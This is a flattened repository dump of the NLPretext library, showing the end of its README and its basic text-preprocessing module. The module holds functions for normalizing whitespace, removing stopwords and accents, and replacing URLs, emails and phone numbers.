| │   ├── augmentation <- Text augmentation scripts 284 | │   ├── basic <- Basic text preprocessing 285 | │   ├── cli <- Command lines that can be used 286 | │   ├── social <- Social text preprocessing 287 | │   ├── token <- Token text preprocessing 288 | │   ├── _config <- Where the configuration and constants live 289 | │   └── _utils <- Where the preprocessing utils scripts live 290 | ├── references <- Assets 291 | ├── tests <- Where the tests live 292 | ├── .gitignore 293 | ├── .pre-commit-config.yaml <- Pre-commit configuration 294 | ├── CODE_OF_CONDUCT.md <- Code of conduct guidelines 295 | ├── CONTRIBUTING.md <- Contribution guidelines 296 | ├── LICENSE 297 | ├── Makefile 298 | ├── pyproject.toml <- Package build configuration 299 | ├── README.md <- The top-level README for developers using this project. 300 | └── SECURITY.md 301 | 302 | # Credits 303 | 304 | - [textacy](https://github.com/chartbeat-labs/textacy) for the following basic preprocessing functions: 305 | - `fix_bad_unicode` 306 | - `normalize_whitespace` 307 | - `unpack_english_contractions` 308 | - `replace_urls` 309 | - `replace_emails` 310 | - `replace_numbers` 311 | - `replace_currency_symbols` 312 | - `remove_punct` 313 | - `remove_accents` 314 | - `replace_phone_numbers` *(with some modifications of our own)* 315 | -------------------------------------------------------------------------------- /nlpretext/basic/preprocess.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2020 Artefact 2 | # licence-information@artefact.com 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License 15 | 16 | 17 | from typing import List, Optional 18 | 19 | import re 20 | import unicodedata 21 | 22 | from flashtext import KeywordProcessor 23 | from ftfy import fix_text as _fix_text 24 | from nlpretext._config import constants 25 | from nlpretext._utils.phone_number import extract_phone_numbers as _extract_phone_numbers 26 | from nlpretext._utils.stopwords import get_stopwords 27 | from nlpretext.token.tokenizer import tokenize 28 | 29 | 30 | def normalize_whitespace(text: str) -> str: 31 | """ 32 | ---- 33 | Copyright 2016 Chartbeat, Inc. 34 | Code from textacy: https://github.com/chartbeat-labs/textacy 35 | ---- 36 | 37 | Given ``text`` str, replace one or more spacings with a single space, and 38 | one or more linebreaks with a single newline. Also strip leading/trailing 39 | whitespace. 40 | eg. " foo bar " -> "foo bar" 41 | 42 | Parameters 43 | ---------- 44 | text : string 45 | 46 | Returns 47 | ------- 48 | string 49 | """ 50 | text = constants.NONBREAKING_SPACE_REGEX.sub( 51 | " ", constants.LINEBREAK_REGEX.sub(r"\n", text) 52 | ).strip() 53 | return text 54 | 55 | 56 | def remove_whitespace(text: str) -> str: 57 | """ 58 | Given ``text`` str, remove one or more spacings and linebreaks. 59 | Also strip leading/trailing whitespace. 60 | eg. " foo bar " -> "foobar". 61 | 62 | Parameters 63 | ---------- 64 | text : string 65 | 66 | Returns 67 | ------- 68 | string 69 | """ 70 | return constants.NONBREAKING_SPACE_REGEX.sub( 71 | "", constants.LINEBREAK_REGEX.sub("", text) 72 | ).strip() 73 | 74 | 75 | def lower_text(text: str) -> str: 76 | """ 77 | Given ``text`` str, transform it into lowercase. 78 | 79 | Parameters 80 | ---------- 81 | text : string 82 | 83 | Returns 84 | ------- 85 | string 86 | """ 87 | return text.lower() 88 | 89 | 90 | def filter_groups(token: str, ignored_stopwords: Optional[List[str]] = None) -> str: 91 | """ 92 | Given ``token`` str and a list of groups of words 93 | that were concatenated into tokens, reverses the tokens 94 | to their ungrouped state.
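eg. filter_groups("newyork", ["new york"]) -> "new york"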
95 | 96 | Parameters 97 | ---------- 98 | token : string 99 | ignored_stopwords : list of strings 100 | 101 | Returns 102 | ------- 103 | string 104 | """ 105 | if ignored_stopwords: 106 | for group in ignored_stopwords: 107 | if token == remove_whitespace(group): 108 | token = group 109 | return token 110 | 111 | 112 | def ungroup_ignored_stopwords( 113 | tokens: List[str], ignored_stopwords: Optional[List[str]] = None 114 | ) -> List[str]: 115 | """ 116 | Given ``tokens`` list of str and a list of groups of words 117 | that are concatenated in tokens, reverses the tokens to 118 | their ungrouped state. 119 | 120 | Parameters 121 | ---------- 122 | tokens : list of strings 123 | ignored_stopwords : list of strings 124 | 125 | Returns 126 | ------- 127 | list of strings 128 | """ 129 | return [filter_groups(token, ignored_stopwords) for token in tokens] 130 | 131 | 132 | def remove_stopwords( 133 | text: str, 134 | lang: str, 135 | custom_stopwords: Optional[List[str]] = None, 136 | ignored_stopwords: Optional[List[str]] = None, 137 | ) -> str: 138 | """ 139 | Given ``text`` str, remove classic stopwords for a given language and 140 | custom stopwords given as a list. Words and groups of words from the 141 | ignored_stopwords list are ignored during stopwords removal. 142 | 143 | Parameters 144 | ---------- 145 | text : string 146 | lang : string 147 | custom_stopwords : list of strings 148 | ignored_stopwords : list of strings 149 | 150 | Returns 151 | ------- 152 | string 153 | 154 | Raises 155 | ------ 156 | ValueError 157 | if ``custom_stopwords`` and ``ignored_stopwords`` have common elements. 158 | """ 159 | if custom_stopwords and ignored_stopwords: 160 | common_elements = set(custom_stopwords).intersection(set(ignored_stopwords)) 161 | if common_elements: 162 | raise ValueError( 163 | "Found common words in custom_stopwords and ignored_stopwords: " 164 | f"{common_elements}. Please remove duplicated values." 165 | ) 166 | stopwords = get_stopwords(lang) 167 | if ignored_stopwords: 168 | keyword_processor = KeywordProcessor() 169 | singletons_to_keep = [x for x in ignored_stopwords if len(x.split()) == 1] 170 | for group_of_words in ignored_stopwords: 171 | keyword_processor.add_keyword(group_of_words, remove_whitespace(group_of_words))  # glue multi-word groups, e.g. "New York" -> "NewYork", so they survive tokenization 172 | text = keyword_processor.replace_keywords(text) 173 | else: 174 | singletons_to_keep = [] 175 | if custom_stopwords: 176 | stopwords += custom_stopwords 177 | if not text: 178 | raise ValueError("Found empty text. Please fix it before using this function.") 179 | if lang in ["fr", "en"]: 180 | lang_module = {"fr": "fr_spacy", "en": "en_spacy"}[lang] 181 | tokens = tokenize(text, lang_module) 182 | else: 183 | tokens = text.split() 184 | tokens = [t for t in tokens if (t not in stopwords or t in singletons_to_keep)] 185 | tokens = ungroup_ignored_stopwords(tokens, ignored_stopwords) 186 | return " ".join(tokens) 187 | 188 | 189 | def remove_eol_characters(text: str) -> str: 190 | r""" 191 | Remove end-of-line (\n) characters. 192 | 193 | Parameters 194 | ---------- 195 | text : str 196 | 197 | Returns 198 | ------- 199 | str 200 | """ 201 | text = text.replace("\n", " ") 202 | return text 203 | 204 | 205 | def fix_bad_unicode(text: str, normalization: str = "NFC") -> str: 206 | """ 207 | ---- 208 | Copyright 2016 Chartbeat, Inc.
209 | Code from textacy: https://github.com/chartbeat-labs/textacy 210 | ---- 211 | 212 | Fix unicode text that's "broken" using `ftfy 213 | <https://ftfy.readthedocs.io>`_; 214 | this includes mojibake, HTML entities and other code cruft, 215 | and non-standard forms for display purposes. 216 | 217 | Parameters 218 | ---------- 219 | text : string 220 | 221 | normalization ({'NFC', 'NFKC', 'NFD', 'NFKD'}): 222 | if 'NFC', combines characters and diacritics written using separate 223 | code points, e.g. converting "e" plus an acute accent modifier into 224 | "é"; unicode 225 | can be converted to NFC form without any change in its meaning! 226 | if 'NFKC', additional normalizations are applied that can change 227 | the meanings of characters, e.g. ellipsis characters will be replaced 228 | with three periods 229 | 230 | Returns 231 | ------- 232 | string 233 | """ 234 | text = _fix_text(text, normalization=normalization) 235 | return text 236 | 237 | 238 | def unpack_english_contractions(text: str) -> str: 239 | """ 240 | ---- 241 | Copyright 2016 Chartbeat, Inc. 242 | Code from textacy: https://github.com/chartbeat-labs/textacy 243 | ---- 244 | 245 | Replace *English* contractions in ``text`` str with their unshortened 246 | forms. 247 | N.B. The "'d" and "'s" forms are ambiguous (had/would, is/has/possessive), 248 | so are left as-is. 249 | eg. "You're fired. She's nice." -> "You are fired. She's nice." 250 | 251 | Parameters 252 | ---------- 253 | text : string 254 | 255 | Returns 256 | ------- 257 | string 258 | """ 259 | # standard 260 | text = constants.CONTRACTION_NT_NOT.sub( 261 | r"\1\2 not", 262 | text, 263 | ) 264 | text = constants.CONTRACTION_LL_WILL.sub( 265 | r"\1\2 will", 266 | text, 267 | ) 268 | text = constants.CONTRACTION_RE_ARE.sub(r"\1\2 are", text) 269 | text = constants.CONTRACTION_VE_HAVE.sub( 270 | r"\1\2 have", 271 | text, 272 | ) 273 | text = constants.CONTRACTION_CANT_CANNOT.sub(r"\1\2n not", text) 274 | text = constants.CONTRACTION_M_AM.sub(r"\1\2 am", text) 275 | text = constants.CONTRACTION_LET_LETUS.sub(r"\1\2 us", text) 276 | text = constants.CONTRACTION_WONT_WILLNOT.sub(r"\1\2ill not", text) 277 | text = constants.CONTRACTION_SHANT_SHALLNOT.sub(r"\1\2hall not", text) 278 | text = constants.CONTRACTION_YALL_YOUALL.sub(r"\1\2ou all", text) 279 | return text 280 | 281 | 282 | def replace_urls(text: str, replace_with: str = "*URL*") -> str: 283 | """ 284 | ---- 285 | Copyright 2016 Chartbeat, Inc. 286 | Code from textacy: https://github.com/chartbeat-labs/textacy 287 | ---- 288 | 289 | Replace all URLs in ``text`` str with ``replace_with`` str. 290 | 291 | Parameters 292 | ---------- 293 | text : string 294 | replace_with : string 295 | the string you want the URL to be replaced with. 296 | 297 | Returns 298 | ------- 299 | string 300 | """ 301 | text = constants.URL_REGEX.sub(replace_with, constants.SHORT_URL_REGEX.sub(replace_with, text)) 302 | return text 303 | 304 | 305 | def replace_emails(text: str, replace_with: str = "*EMAIL*") -> str: 306 | """ 307 | ---- 308 | Copyright 2016 Chartbeat, Inc. 309 | Code from textacy: https://github.com/chartbeat-labs/textacy 310 | ---- 311 | 312 | Replace all emails in ``text`` str with ``replace_with`` str. 313 | 314 | Parameters 315 | ---------- 316 | text : string 317 | replace_with : string 318 | the string you want the email address to be replaced with.
319 | 320 | Returns 321 | ------- 322 | string 323 | """ 324 | text = constants.EMAIL_REGEX.sub(replace_with, text) 325 | return text 326 | 327 | 328 | def replace_phone_numbers( 329 | text: str, 330 | country_to_detect: List[Optional[str]], 331 | replace_with: str = "*PHONE*", 332 | method: str = "regex", 333 | ) -> str: 334 | """ 335 | ---- 336 | Copyright 2016 Chartbeat, Inc. 337 | Code inspired by textacy: https://github.com/chartbeat-labs/textacy 338 | ---- 339 | 340 | Replace all phone numbers in ``text`` str with ``replace_with`` str. 341 | 342 | Parameters 343 | ---------- 344 | text : string 345 | replace_with : string 346 | the string you want the phone number to be replaced with. 347 | method : ['regex','detection'] 348 | 'regex' is faster but will miss a lot of numbers, while 'detection' 349 | catches far more formats but takes a while. 350 | country_to_detect : list 351 | If a list of country codes is specified, every number formatted 352 | for those countries will be caught. 353 | Only used when method = 'detection'. 354 | 355 | Returns 356 | ------- 357 | string 358 | """ 359 | if method == "regex": 360 | text = constants.PHONE_REGEX.sub(replace_with, text) 361 | elif method == "detection": 362 | found_nums = _extract_phone_numbers(text, countrylist=country_to_detect) 363 | 364 | # Sort by length so longer numbers are replaced first and truncated matches do not clobber them. 365 | found_nums.sort(key=len, reverse=True) 366 | for phone_number in found_nums: 367 | text = text.replace(phone_number, replace_with) 368 | else: 369 | raise ValueError( 370 | 'Please input a valid method, either "regex" ' 371 | 'or "detection".' 372 | ) 373 | return text 374 | 375 | 376 | def replace_numbers(text: str, replace_with: str = "*NUMBER*") -> str: 377 | """ 378 | ---- 379 | Copyright 2016 Chartbeat, Inc. 380 | Code from textacy: https://github.com/chartbeat-labs/textacy 381 | ---- 382 | 383 | Replace all numbers in ``text`` str with ``replace_with`` str. 384 | 385 | Parameters 386 | ---------- 387 | text : string 388 | replace_with : string 389 | the string you want the number to be replaced with. 390 | 391 | Returns 392 | ------- 393 | string 394 | """ 395 | text = constants.NUMBERS_REGEX.sub(replace_with, text) 396 | return text 397 | 398 | 399 | def replace_currency_symbols(text: str, replace_with: Optional[str] = None) -> str: 400 | """ 401 | ---- 402 | Copyright 2016 Chartbeat, Inc. 403 | Code from textacy: https://github.com/chartbeat-labs/textacy 404 | ---- 405 | 406 | Replace all currency symbols in ``text`` str with string specified by 407 | ``replace_with`` str. 408 | 409 | Parameters 410 | ---------- 411 | text : str 412 | raw text 413 | replace_with : None or string 414 | if None (default), replace symbols with 415 | their standard 3-letter abbreviations (e.g. '$' with 'USD', '£' 416 | with 'GBP'); otherwise, pass in a string with which to replace all 417 | symbols (e.g. "*CURRENCY*") 418 | 419 | Returns 420 | ------- 421 | string 422 | """ 423 | if replace_with is None: 424 | for k, v in constants.CURRENCIES.items(): 425 | text = text.replace(k, v) 426 | else: 427 | text = constants.CURRENCY_REGEX.sub(replace_with, text) 428 | return text 429 | 430 | 431 | def remove_punct(text: str, marks: Optional[str] = None) -> str: 432 | """ 433 | Remove punctuation from ``text`` by replacing all instances of ``marks`` 434 | with whitespace. 435 | 436 | Parameters 437 | ---------- 438 | text : str 439 | raw text 440 | 441 | marks : str or None 442 | If specified, remove only the characters in this string, 443 | e.g.
``marks=',;:'`` removes commas, semi-colons, and colons. 444 | Otherwise, all punctuation marks are removed. 445 | 446 | Returns 447 | ------- 448 | string 449 | 450 | Note 451 | ------- 452 | When ``marks=None``, Python's built-in :meth:`str.translate()` is 453 | used to remove punctuation; otherwise, a regular expression is used 454 | instead. The former's performance is about 5-10x faster. 455 | """ 456 | if marks: 457 | text = re.sub(f"[{re.escape(marks)}]+", " ", text, flags=re.UNICODE) 458 | else: 459 | text = text.translate(constants.PUNCT_TRANSLATE_UNICODE) 460 | return text 461 | 462 | 463 | def remove_accents(text: str, method: str = "unicode") -> str: 464 | """ 465 | Remove accents from any accented unicode characters in ``text`` str, 466 | either by transforming them into ascii equivalents or removing them 467 | entirely. 468 | 469 | Parameters 470 | ---------- 471 | text : str 472 | raw text 473 | 474 | method : ({'unicode', 'ascii'}) 475 | if 'unicode', remove accented 476 | char for any unicode symbol with a direct ASCII equivalent; if 'ascii', 477 | remove accented char for any unicode symbol 478 | 479 | NB: the 'ascii' method is notably faster than 'unicode', but less thorough 480 | 481 | Returns 482 | ------- 483 | string 484 | 485 | Raises 486 | ------ 487 | ValueError 488 | if ``method`` is not in {'unicode', 'ascii'} 489 | """ 490 | if method == "unicode": 491 | text = "".join( 492 | c for c in unicodedata.normalize("NFKD", text) if not unicodedata.combining(c) 493 | ) 494 | elif method == "ascii": 495 | text = unicodedata.normalize("NFKD", text).encode("ascii", errors="ignore").decode("ascii") 496 | else: 497 | msg = f'`method` must be either "unicode" or "ascii", not {method}' 498 | raise ValueError(msg) 499 | return text 500 | 501 | 502 | def remove_multiple_spaces_and_strip_text(text: str) -> str: 503 | """ 504 | Remove multiple spaces, strip text, and remove '-', '*' characters. 505 | 506 | Parameters 507 | ---------- 508 | text : str 509 | the text to be processed 510 | 511 | Returns 512 | ------- 513 | string 514 | the stripped text, with multiple spaces removed 515 | """ 516 | regex_remove_multiple_spaces_list = ["\\t", "[\\s\\-\\*]{2,}"] 517 | for regex_remove_multiple_spaces in regex_remove_multiple_spaces_list: 518 | text = re.sub(regex_remove_multiple_spaces, " ", text) 519 | text = text.strip() 520 | return text 521 | 522 | 523 | def filter_non_latin_characters(text: str) -> str: 524 | """ 525 | Filter out non-Latin characters from a text. 526 | 527 | Parameters 528 | ---------- 529 | text : string 530 | 531 | Returns 532 | ------- 533 | string 534 | """ 535 | text = constants.LATIN_CHARACTERS_RE.sub(" ", text) 536 | text = normalize_whitespace(text) 537 | return text 538 | --------------------------------------------------------------------------------